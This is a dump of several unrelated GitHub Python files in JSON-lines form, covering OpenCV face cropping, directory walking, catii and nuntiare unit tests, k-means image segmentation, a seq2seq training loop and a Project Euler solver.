generator.generate(\"direct_rel\")","repo_name":"zyksir/AdversarialAttackOnKGE","sub_path":"codes/noise_generator/direct_addition.py","file_name":"direct_addition.py","file_ext":"py","file_size_in_byte":10916,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"19787266098","text":"import cv2\r\n\r\nface_cascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml')\r\n\r\ndef captureFace(img_original):\r\n frame = img_original\r\n img = frame\r\n face_area_image = img\r\n faces = face_cascade.detectMultiScale(frame, 1.1, minNeighbors = 3,minSize=(20, 
20))\r\n    SAFE_MARGIN_W = 0\r\n    SAFE_MARGIN_H = 0\r\n\r\n    for (x, y, w, h) in faces:\r\n        # draw the face bounding box in blue with a thin stroke\r\n        img = cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2)\r\n        # crop the face region and run eye detection there instead of on the whole image, to save compute\r\n        face_area = img[y:y + h, x:x + w]\r\n        face_area_image = frame[y - int(h * SAFE_MARGIN_H):y + int(h * (SAFE_MARGIN_H + 1)),\r\n                          x - int(w * SAFE_MARGIN_W):x + int(w * (SAFE_MARGIN_W + 1))]\r\n\r\n    # cv2.imshow('frameFace', face_area_image)\r\n    # cv2.imshow('frame2Q', img)\r\n    # cv2.waitKey(0)\r\n    # cv2.destroyAllWindows()\r\n    return face_area_image,len(faces),img\r\n\r\n#\r\n# img_path='89605_1958-07-06_2014.jpg'\r\n# iaaa=cv2.imread(img_path, 0)\r\n# captureFace(iaaa)\r\n\r\n","repo_name":"VincentAC-stack/Gender-Prediction","sub_path":"capture_Face.py","file_name":"capture_Face.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"5836872483","text":"import os\n\ndef walk(dirname):\n\tfor name in os.listdir(dirname):\n\t\tpath = os.path.join(dirname,name)\n\n\t\tif os.path.isfile(path):\n\t\t\tprint(path)\n\t\telse:\n\t\t\twalk(path)\n\ncwd = os.getcwd()\n\nabs_path = os.path.abspath('aainw.txt')\nprint(abs_path)\nprint(os.path.exists('emma.txt'))\nprint(os.path.isdir('C:\\\\Users\\\\apost'))\nprint(os.path.isfile('output.txt'))\n#print(os.listdir(cwd))\nwalk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding')\nprint('---')\nfor root, dirs, files in os.walk('C:\\\\Users\\\\apost\\\\Documents\\\\_Coding'):\n    for name in files:\n        print(os.path.join(root, name))\n    for name in dirs:\n        print(os.path.join(root, name))\n\nfout = open('output.txt', 'w')\n\nline1 = \"This is line one.\"\nline2 = \"The is the second line.\"\nfout.write(line1)\nfout.write(line2)\n\nfout.close()","repo_name":"dominicwllmsn/thinkpython","sub_path":"exercises/chapter14/test142.py","file_name":"test142.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70270020488","text":"import numpy\n\nfrom catii import ccube, iindex\n\nfrom catii.ffuncs import ffunc_count, ffunc_sum\n\nfrom . 
import arr_eq, compare_ccube_to_xcube\n\n\nclass TestCubeCreation:\n def test_direct_construction(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.intersection_data_points == 0\n assert cube.shape == (2, 2)\n\n def test_explicit_shape_arg(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n\n cube = ccube([idx1, idx2], interacting_shape=(2, 2))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (2, 2)\n\n cube = ccube([idx1, idx2], interacting_shape=(4, 3))\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (4, 3)\n\n def test_implicit_shape_arg(self):\n # Construct indexes where the common value is the highest value,\n # to make sure we are not only looking at index values to infer shape.\n idx1 = iindex({(0,): [0, 2, 7]}, 2, (8,))\n idx2 = iindex({(0,): [0, 2, 5]}, 3, (8,))\n cube = ccube([idx1, idx2])\n\n assert cube.dims == [idx1, idx2]\n assert cube.shape == (3, 4)\n\n\nclass TestCubeDimensions:\n def test_cube_1d_x_1d(self):\n with compare_ccube_to_xcube():\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n idx2 = iindex({(1,): [0, 2, 5]}, 0, (8,))\n cube = ccube([idx1, idx2])\n assert cube.count().tolist() == [[4, 1], [1, 2]]\n\n\nclass TestCubeProduct:\n def test_cube_product(self):\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {k: v.tolist() for k, v in dim[\"data\"].items()}\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n )\n ]\n\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n result = list(cube.product())\n for subcube in result:\n for dim in subcube:\n dim[\"data\"] = {\n k: v if isinstance(v, list) else v.tolist()\n for k, v in dim[\"data\"].items()\n }\n assert result == [\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (0,), \"data\": {(1,): [0, 2, 5]}},\n ),\n (\n {\"coords\": (), \"data\": {(1,): [0, 2, 7]}},\n {\"coords\": (1,), \"data\": {(1,): [3, 4]}},\n ),\n ]\n\n\nclass TestCubeCalculate:\n def test_cube_calculate(self):\n # [1, 0, 1, 0, 0, 0, 0, 1]\n idx1 = iindex({(1,): [0, 2, 7]}, 0, (8,))\n cube = ccube([idx1, idx1])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[5, float(\"nan\")], [float(\"nan\"), 3]])\n\n # 0: [1, 0, 1, 0, 0, 1, 0, 0],\n # 1: [0, 0, 0, 1, 1, 0, 0, 0]\n idx2 = iindex({(1, 0): [0, 2, 5], (1, 1): [3, 4]}, 0, (8, 2))\n cube = ccube([idx1, idx2])\n counts = cube.calculate([ffunc_count()])[0]\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n\n fsum = ffunc_sum((numpy.arange(8)))\n counts, sums = cube.calculate([ffunc_count(), fsum])\n assert arr_eq(counts, [[[4, 1], [1, 2]], [[3, 2], [3, float(\"nan\")]]])\n assert arr_eq(sums, [[[14, 5], [7, 2]], [[12, 7], [9, float(\"nan\")]]])\n","repo_name":"Crunch-io/catii","sub_path":"tests/test_ccubes.py","file_name":"test_ccubes.py","file_ext":"py","file_size_in_byte":3692,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"72736739529","text":"from matplotlib import pyplot as plt\nimport cv2\nimport numpy as np\n\ntrain_num = 7202\nval_num = 522\n\ndef BW(total, set):\n\tfor i in range(total):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set 
+ '/' + str(i+1) + '.jpg'\n\t\tpic = plt.imread(path)/255 # dividing by 255 to bring the pixel values between 0 and 1\n\t\t# plt.imshow(pic)\n\n\t\tpic_n = pic.reshape(pic.shape[0]*pic.shape[1], pic.shape[2])\n\t\t# print(pic_n.shape)\n\n\t\tfrom sklearn.cluster import KMeans\n\t\tkmeans = KMeans(n_clusters=2, random_state=0).fit(pic_n)\n\t\t# print(kmeans.labels_)\n\t\tpic2show = kmeans.cluster_centers_[kmeans.labels_]\n\t\t# np.histogram(pic2show)\n\t\t# plt.hist(pic2show[:, 0], bins='auto')\n\t\t# plt.show()\n\t\tflattened = pic2show.flatten()\n\t\tmean = (max(flattened) + min(flattened)) / 2\n\t\tfor r, each_row in enumerate(pic2show):\n\t\t\tfor c, col in enumerate(each_row):\n\t\t\t\tif col > mean:\n\t\t\t\t\tpic2show[r, c] = 1\n\t\t\t\telse:\n\t\t\t\t\tpic2show[r, c] = 0\n\n\t\tcluster_pic = pic2show.reshape(pic.shape[0], pic.shape[1], pic.shape[2])\n\t\tpath1 = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set + '/BW/clean' + str(i + 1) + '.jpg'\n\t\tcv2.imwrite(path1, cluster_pic * 255)\n\t# print(\"done\")\n\ndef overlap(rect, rest):\n\tfor rect_each in rest:\n\t\t_x, _y, _w, _h = rect_each\n\t\tx, y, w, h = rect\n\t\tif x + w <= _x + _w and x > _x and y + h <= _y + _h and y >= _y:\n\t\t\t# inside\n\t\t\tprint(\"{} is inside {}\".format(rect, rect_each))\n\t\t\treturn True\n\treturn False\n\ndef segment(total_num):\n\t# segmentation version 2\n\tfor i in range(total_num):\n\t\tpath = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/BW/clean' + str(i+1) + '.jpg'\n\t\tsrc = cv2.imread(path, 1) # read input image 3 color\n\t\theight, width, channels = src.shape\n\t\tarea = height * width\n\n\t\tgray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY) # convert to grayscale\n\t\tblur = cv2.blur(gray, (3, 3)) # blur the image\n\t\tret, thresh = cv2.threshold(blur, 127, 255, cv2.THRESH_BINARY)\n\n\t\tcontours,hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n\t\t# create hull array for convex hull points\n\t\thull = []\n\t\thull_vertices = []\n\n\t\trect = []\n\t\trect_vertices = []\n\n\t\tdrawing_rect = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t# calculate points for each contour\n\t\tfor ci in range(len(contours)):\n\t\t\t# creating convex hull object for each contour\n\t\t\thull_vertices.append(cv2.convexHull(contours[ci], clockwise=True))\n\t\t\thull.append(cv2.convexHull(contours[ci], False))\n\t\t\tx, y, w, h = cv2.boundingRect(contours[ci])\n\t\t\trect.append([x, y, w, h])\n\n\t\tprint(area)\n\t\tfiltered_rect = []\n\t\tfor rect_info in rect:\n\t\t\tx, y, w, h = rect_info\n\t\t\tif w * h > 0.85 * area:\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tfiltered_rect.append(rect_info)\n\n\t\tfiltered_rect_2 = []\n\t\tto_remove = []\n\t\tfor rect_info in filtered_rect:\n\t\t\t# points_4 = [(x, y), (x, y + w), (x + h, y + w), (x + h, y)]\n\t\t\trest = [can for can in filtered_rect if can != rect_info]\n\t\t\tis_inside = overlap(rect_info, rest)\n\t\t\tif is_inside:\n\t\t\t\tto_remove.append(rect_info)\n\n\t\t# print(filtered_rect)\n\t\tfiltered_rect_2 = [can for can in filtered_rect if can not in to_remove]\n\t\t# print(filtered_rect_2)\n\n\t\tif plot:\n\t\t\tfor each in filtered_rect_2:\n\t\t\t\tx, y, w, h = each\n\t\t\t\tcv2.rectangle(drawing_rect, (x, y), (x + w, y + h), (255, 0, 0), 1)\n\n\t\t# save splits - sort by column\n\t\timport operator, os\n\t\tfiltered_rect_2.sort(key=operator.itemgetter(1))\n\n\t\tprint(filtered_rect_2)\n\t\tfor idx, sorted_each in enumerate(filtered_rect_2):\n\t\t\tx, y, w, h = sorted_each\n\t\t\tcrop 
= src[y: y+h, x: x+w]\n\t\t\tout_dir = '/Users/huiwenyou/Desktop/hack/pics/cell_images/' + set_name + '/Split/f' + str(i+1) + '/'\n\t\t\tif not os.path.exists(out_dir):\n\t\t\t\tos.mkdir(out_dir)\n\t\t\tout_path = out_dir + str(i) + '_' + str(idx+1) + '.jpg'\n\t\t\tcv2.imwrite(out_path, crop)\n\t\t\t# crop.save(out_path, 'jpg')\n\n\t\tif plot:\n\t\t\tcv2.imshow(\"rect\", drawing_rect)\n\t\t\t# create an empty black image\n\t\t\tdrawing_hull = np.zeros((thresh.shape[0], thresh.shape[1], 3), np.uint8)\n\t\t\t# draw contours and hull points\n\t\t\tfor i in range(len(contours)):\n\t\t\t\tcolor_contours = (0, 255, 0) # green - color for contours\n\t\t\t\tcolor = (255, 0, 0) # blue - color for convex hull\n\t\t\t\t# draw ith contour\n\t\t\t\tcv2.drawContours(drawing_hull, contours, i, color_contours, 1, 8, hierarchy)\n\t\t\t\t# draw ith convex hull object\n\t\t\t\tcv2.drawContours(drawing_hull, hull, i, color, 1, 8)\n\t\t\tcv2.imshow(\"hull\", drawing_hull)\n\t\t\tcv2.waitKey()\n\t\t\tcv2.destroyAllWindows()\n\n\n\nplot = True\ntotal_num = train_num #val_num\nset_name = 'training_set' #'validation_set'\n\n# for BW\nBW(total_num, set_name)\n","repo_name":"HarveyYan/OCR2Text","sub_path":"kmean.py","file_name":"kmean.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41937032938","text":"def trainIters(encoder, decoder, n_iters, batch_size=1, print_every=1000, save_every=1000, plot_every=100,\n learning_rate=0.0001):\n start = time.time()\n plot_losses = []\n val_losses = []\n print_loss_total = 0 # Reset every print_every\n plot_loss_total = 0 # Reset every plot_every\n\n encoder_optimizer = optim.SGD(encoder.parameters(), lr=learning_rate)\n decoder_optimizer = optim.SGD(decoder.parameters(), lr=learning_rate)\n # training_pairs = [sent_pairs[i] for i in range(n_iters)]\n training_pairs = [random.sample(sent_pairs, batch_size) for i in range(n_iters)]\n\n # training_pairs = [tensorsFromPair(random.choice(pairs)) for i in range(n_iters)]\n criterion = nn.NLLLoss()\n\n patience = 10 # mod Pier\n\n for iter in range(1, n_iters + 1):\n training_pair = training_pairs[iter - 1]\n # print(\"################################\")\n # print(training_pair)\n input_tensor = training_pair[0][0]\n target_tensor = training_pair[0][1]\n # print(\"printing tensors for training...\")\n # print(input_tensor)\n # print(target_tensor)\n\n loss = get_train_loss(input_tensor, target_tensor, encoder, decoder, encoder_optimizer, decoder_optimizer,\n criterion)\n print_loss_total += loss\n plot_loss_total += loss\n\n stopping_delta = 0.01 # if improvement is not more than this amount after n tries, exit the loop\n prev_val_loss = 999\n\n if iter % print_every == 0:\n print_loss_avg = print_loss_total / print_every\n print_loss_total = 0\n print('Training loss: %s (%d %d%%) %.4f' % (timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, print_loss_avg))\n\n total_val_loss = 0\n total_val_pairs = len(val_sent_tensor_pairs)\n\n for itr in range(0, len(val_sent_tensor_pairs)):\n val_input_tensor = val_sent_tensor_pairs[itr][0]\n val_target_tensor = val_sent_tensor_pairs[itr][1]\n # print(\"Validation record: {0}\".format(itr))\n # print(val_sent_pairs[itr])\n val_loss = get_validation_loss(val_input_tensor, val_target_tensor, encoder, decoder, criterion)\n total_val_loss += val_loss\n\n avg_val_loss = total_val_loss / total_val_pairs\n val_losses.append(avg_val_loss)\n print('Validation loss: %s (%d %d%%) %.4f' % 
(timeSince(start, iter / n_iters),\n iter, iter / n_iters * 100, avg_val_loss))\n\n # mod P_ier\n if abs(avg_val_loss - prev_val_loss) > stopping_delta:\n print(f\"No improvement in validation loss, losing patience, saving model : {patience}\")\n encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n print('save encoder weights to ', encoder_save_path)\n torch.save(encoder.state_dict(), encoder_save_path)\n decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n print('save decoder weights to ', decoder_save_path)\n torch.save(decoder.state_dict(), decoder_save_path)\n\n patience -= 1\n\n if patience == 0: # break out of training\n break\n\n prev_val_loss = avg_val_loss\n # end mod Pier\n\n print(\"##########################################################\")\n\n if iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / plot_every\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n\n # # save trained encoder and decoder\n # if iter % save_every == 0:\n # encoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'encoder', iter)\n # print('save encoder weights to ', encoder_save_path)\n # torch.save(encoder.state_dict(), encoder_save_path)\n # decoder_save_path = '%s/%s-%d.pth' % (SAVE_PATH, 'decoder', iter)\n # print('save decoder weights to ', decoder_save_path)\n # torch.save(decoder.state_dict(), decoder_save_path)\n\n showPlot(plot_losses, 'train_plot.png')\n showPlot(val_losses, 'validation_plot.png')\n\n return plot_losses, val_losses","repo_name":"lppier/Seq2Seq_Eng2Indo-Translation","sub_path":"writing_stopping_criteria.py","file_name":"writing_stopping_criteria.py","file_ext":"py","file_size_in_byte":4351,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"} +{"seq_id":"70061108487","text":"from utils.primes import get_primes\n\n\ndef get_min_phi_ratio_perm(max_n: int) -> int:\n \"\"\"\n Get the values of 1 < n < 10^7 such that n and phi(n) are permutations and\n n/phi(n) is minimum.\n\n This is achieved when n = p1 * p2 for primes p1 and p2.\n Also, phi(p1 * p2) = (p1 - 1)(p2 - 1)\n \"\"\"\n # Obviously you won't know the search range 10^3 < p < 10^4 beforehand\n bounded_primes = [p for p in get_primes(max_n) if 10**3 < p < 10**4]\n len_primes = len(bounded_primes)\n\n sol_n = 0\n min_ratio = float(\"inf\")\n\n for i, p in enumerate(bounded_primes):\n for j in range(i + 1, len_primes):\n q = bounded_primes[j]\n n = p * q\n if n > 10000000:\n break\n phi = (p - 1) * (q - 1)\n ratio = n / phi\n if ratio < min_ratio and sorted(str(n)) == sorted(str(phi)):\n min_ratio = ratio\n sol_n = n\n return sol_n\n","repo_name":"JohN100x1/Project-Euler","sub_path":"src/solutions/p070.py","file_name":"p070.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"2490719421","text":"import unittest\nfrom tools import get_report_path\nfrom datetime import datetime\nfrom decimal import Decimal\nfrom nuntiare.report import Report\nimport nuntiare.definition.functions as fn\n\n\nclass AggregateTest(unittest.TestCase):\n def test_aggregate(self):\n '''\n Test a simple table (Tablix with just a TablixBody)\n and aggregates Count, RunningValue, RowNumber, and\n Sum in diferent contexts.\n Test Grouping and sorting too.\n '''\n report = Report(get_report_path('northwind_orders.xml'))\n\n con_file_info = open(\"db_test_connection_northwind\", \"r\")\n conn_str = con_file_info.readline()\n con_file_info.close()\n\n parameters = {\n 
'conn_string': conn_str,\n 'query_limit': 100,\n }\n report.run(parameters)\n\n grid = report.result.body.items.item_list[0].grid_body\n\n self.assertEqual(self._cell_value(grid, 0, 2), 'Product')\n self.assertEqual(self._cell_value(grid, 0, 11), 'Running Avg')\n\n # Austria\n self._ckeck_country_header(\n grid, 1, 7, 1, 'Austria', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_customer_header(\n grid, 2, 1, 'Ernst Handel', 305.00,\n 4483.4, 994.72, 3488.68, 7, 3488.68, 498.38)\n self._ckeck_order_header(grid, 3, 1, 10258)\n self._ckeck_order_line(\n grid, 4, 1, 'Chang', 50.0,\n 15.2, 760.0, 0.2, 152.0, 608.0, 1, 608.0, 608.0, 1)\n self._ckeck_order_line(\n grid, 6, 3, 'Mascarpone Fabioli', 6.0,\n 25.6, 153.6, 0.2, 30.72, 122.88, 3, 1614.88, 538.29, 3)\n self._ckeck_order_footer(\n grid, 7, 3, 3, 3, 2018.6, 4483.4, 4483.4,\n 1614.88, 1614.88, 1614.88, 10258)\n self._ckeck_order_header(grid, 8, 2, 10263)\n self._ckeck_order_line(\n grid, 10, 5, 'Longlife Tofu', 36.0,\n 8.0, 288.0, 0.25, 72.0, 216.0, 2, 316.8, 158.4, 5)\n self._ckeck_order_line(\n grid, 12, 7, 'Pavlova', 60.0,\n 13.9, 834.0, 0.25, 208.50, 625.5, 4, 1873.8, 468.45, 7)\n self._ckeck_order_footer(\n grid, 13, 4, 7, 7, 2464.8, 4483.4, 4483.4,\n 1873.8, 3488.68, 3488.68, 10263)\n\n # Brazil\n self._ckeck_country_header(\n grid, 21, 20, 3, 'Brazil', 229.0,\n 4223.6, 260.4, 3963.2, 10, 3963.2, 396.32)\n self._ckeck_customer_header(\n grid, 22, 1, 'Hanari Carnes', 162.00,\n 3257.8, 260.4, 2997.4, 6, 2997.4, 499.57)\n self._ckeck_order_header(grid, 23, 1, 10250)\n self._ckeck_order_line(\n grid, 24, 11, \"Jack's New England Clam Chowder\", 10.0,\n 7.7, 77.0, 0.0, 0.0, 77.0, 1, 77.0, 77.0, 11)\n self._ckeck_order_line(\n grid, 26, 13, \"Manjimup Dried Apples\", 35.0,\n 42.4, 1484.0, 0.15, 222.6, 1261.4, 3, 1552.6, 517.53, 13)\n self._ckeck_order_footer(\n grid, 27, 3, 3, 3, 1813.0, 3257.8, 4223.6,\n 1552.6, 1552.6, 1552.6, 10250)\n self._ckeck_order_footer(\n grid, 32, 3, 6, 6, 1444.8, 3257.8, 4223.6,\n 1444.8, 2997.4, 2997.4, 10253)\n self._ckeck_customer_header(\n grid, 33, 2, 'Que Delícia', 40.0,\n 448.0, 0.0, 448.0, 2, 448.0, 224.0)\n self._ckeck_order_footer(\n grid, 37, 2, 2, 8, 448.0, 448.0, 4223.6,\n 448.0, 448.0, 3445.4, 10261)\n self._ckeck_customer_header(\n grid, 38, 3, \"Wellington Importadora\", 27.0,\n 517.8, 0.0, 517.8, 2, 517.8, 258.9)\n self._ckeck_order_line(\n grid, 41, 20, \"Perth Pasties\", 15.0,\n 26.2, 393.0, 0.0, 0.0, 393.0, 2, 517.8, 258.9, 20)\n self._ckeck_order_footer(\n grid, 42, 2, 2, 10, 517.8, 517.8, 4223.6,\n 517.8, 517.8, 3963.2, 10256)\n\n # Venezuela\n self._ckeck_country_header(\n grid, 200, 100, 13, 'Venezuela', 136.0,\n 3635.9, 0.0, 3635.9, 9, 3635.9, 403.99)\n self._ckeck_customer_header(\n grid, 201, 1, \"GROSELLA-Restaurante\", 14.0,\n 1101.2, 0.0, 1101.2, 2, 1101.2, 550.6)\n self._ckeck_order_line(\n grid, 203, 92, \"Mozzarella di Giovanni\", 4.0,\n 27.8, 111.2, 0.0, 0.0, 111.2, 1, 111.2, 111.2, 92)\n self._ckeck_order_footer(\n grid, 205, 2, 2, 2, 1101.2, 1101.2, 3635.9,\n 1101.2, 1101.2, 1101.2, 10268)\n self._ckeck_order_footer(\n grid, 218, 4, 4, 9, 1414.8, 1414.8, 3635.9,\n 1414.8, 1414.8, 3635.9, 10283)\n\n def _ckeck_order_footer(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n 
self.assertEqual(round(self._cell_value(grid, row, 4), 2), v4)\n # Sum('F.subtotal1', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # Sum('F.subtotal1', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 6), 2), v6)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 9), 2), v9)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 10), v10)\n\n def _ckeck_order_line(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12):\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # F.product\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # F.quantity\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # F.unitprice\n self.assertEqual(self._cell_value(grid, row, 4), v4)\n # F.subtotal1\n self.assertEqual(round(self._cell_value(grid, row, 5), 2), v5)\n # F.discount\n self.assertEqual(self._cell_value(grid, row, 6), v6)\n # F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 7), 2), v7)\n # F.subtotal1 - F.discount_amount\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v8)\n # RowNumber('orderid')\n self.assertEqual(self._cell_value(grid, row, 9), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v10)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'orderid')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v11)\n # RowNumber('TablixOrder')\n self.assertEqual(self._cell_value(grid, row, 12), v12)\n\n def _ckeck_order_header(self, grid, row, v1, v2):\n # RunningValue('F.orderid','CountDistinct','customer')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.orderid\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n\n def _ckeck_customer_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9):\n # RunningValue('F.customer', 'CountDistinct', 'country')\n self.assertEqual(self._cell_value(grid, row, 1), v1)\n # F.customer\n self.assertEqual(self._cell_value(grid, row, 2), v2)\n # Sum('F.quantity')\n self.assertEqual(self._cell_value(grid, row, 3), v3)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v4)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v5)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v6)\n # RowNumber('customer')\n self.assertEqual(self._cell_value(grid, row, 9), v7)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'customer')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v9)\n\n def _ckeck_country_header(\n self, grid, row,\n v1, v2, v3, v4, v5, v6, v7, v8, v9, v10):\n # RowNumber() in Tablix contexts (Counting countries)\n self.assertEqual(self._cell_value(grid, row, 0), v1)\n # RunningValue('F.country', 'CountDistinct')\n self.assertEqual(self._cell_value(grid, row, 1), v2)\n # F.country\n self.assertEqual(self._cell_value(grid, row, 2), v3)\n # Sum('F.quantity')\n 
self.assertEqual(self._cell_value(grid, row, 3), v4)\n # Sum('F.subtotal1')\n self.assertEqual(self._cell_value(grid, row, 5), v5)\n # Sum('F.discount_amount')\n self.assertEqual(self._cell_value(grid, row, 7), v6)\n # Sum('F.subtotal1 - F.discount_amount')\n self.assertEqual(round(self._cell_value(grid, row, 8), 2), v7)\n # RowNumber('country')\n self.assertEqual(self._cell_value(grid, row, 9), v8)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Sum', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 10), 2), v9)\n # RunningValue('F.subtotal1 - F.discount_amount', 'Avg', 'country')\n self.assertEqual(round(self._cell_value(grid, row, 11), 2), v10)\n\n def _cell_value(self, grid, row, column):\n cell = grid.get_cell(row, column)\n return cell.object.item_list[0].value\n\n def test_functions(self):\n # Conversion functions\n self.assertEqual(fn.CBool('true'), True)\n self.assertEqual(fn.CBool('t'), True)\n\n self.assertEqual(\n fn.CDate('20151231'), datetime(2015, 12, 31, 0, 0, 0))\n self.assertEqual(\n fn.CDate('20151231 23:59:59'), datetime(2015, 12, 31, 23, 59, 59))\n\n self.assertEqual(fn.CInt('1'), 1)\n self.assertEqual(fn.CInt(1.1), 1)\n\n self.assertEqual(fn.CFloat('1.1'), 1.1)\n self.assertEqual(fn.CInt(fn.CFloat('1.1')), 1)\n\n self.assertEqual(fn.CDecimal('1.1'), Decimal('1.1'))\n self.assertEqual(fn.CDecimal(1.1), Decimal(1.1))\n\n self.assertEqual(fn.CStr(1.1), '1.1')\n self.assertEqual(fn.CStr(True), 'True')\n self.assertEqual(\n fn.CStr(datetime(2015, 12, 31, 0, 0, 0)), '2015-12-31 00:00:00')\n\n # Conditional functions\n self.assertEqual(fn.Iif(True, 'a', 'b'), 'a')\n self.assertEqual(fn.Iif(False, 'a', 'b'), 'b')\n self.assertEqual(fn.Iif(None, 'a', 'b'), 'b')\n\n self.assertEqual(fn.Switch(0, 0, 'a', 1, 'b', 2, 'c'), 'a')\n self.assertEqual(fn.Switch(1, 0, 'a', 1, 'b', 2, 'c'), 'b')\n self.assertEqual(fn.Switch(2, 0, 'a', 1, 'b', 2, 'c'), 'c')\n\n self.assertEqual(fn.Choose(1, 'a', 'b', 'c'), 'a')\n self.assertEqual(fn.Choose(2, 'a', 'b', 'c'), 'b')\n self.assertEqual(fn.Choose(3, 'a', 'b', 'c'), 'c')\n\n # Date funtions\n self.assertEqual(fn.Day(datetime(2015, 12, 31, 23, 15, 49)), 31)\n self.assertEqual(fn.Month(datetime(2015, 12, 31, 23, 15, 49)), 12)\n self.assertEqual(fn.Year(datetime(2015, 12, 31, 23, 15, 49)), 2015)\n self.assertEqual(fn.Hour(datetime(2015, 12, 31, 23, 15, 49)), 23)\n self.assertEqual(fn.Minute(datetime(2015, 12, 31, 23, 15, 49)), 15)\n self.assertEqual(fn.Second(datetime(2015, 12, 31, 23, 15, 49)), 49)\n self.assertEqual(fn.Day(fn.Today()), fn.Day(datetime.today()))\n\n # String funtions\n self.assertEqual(fn.Format('Hello', 'Hello'), 'Hello')\n self.assertEqual(fn.Format('World!', 'Hello {0}'), 'Hello World!')\n self.assertEqual(fn.Format(12, '{:,.2f}'), '12.00')\n\n self.assertEqual(fn.LCase('To Lower'), 'to lower')\n 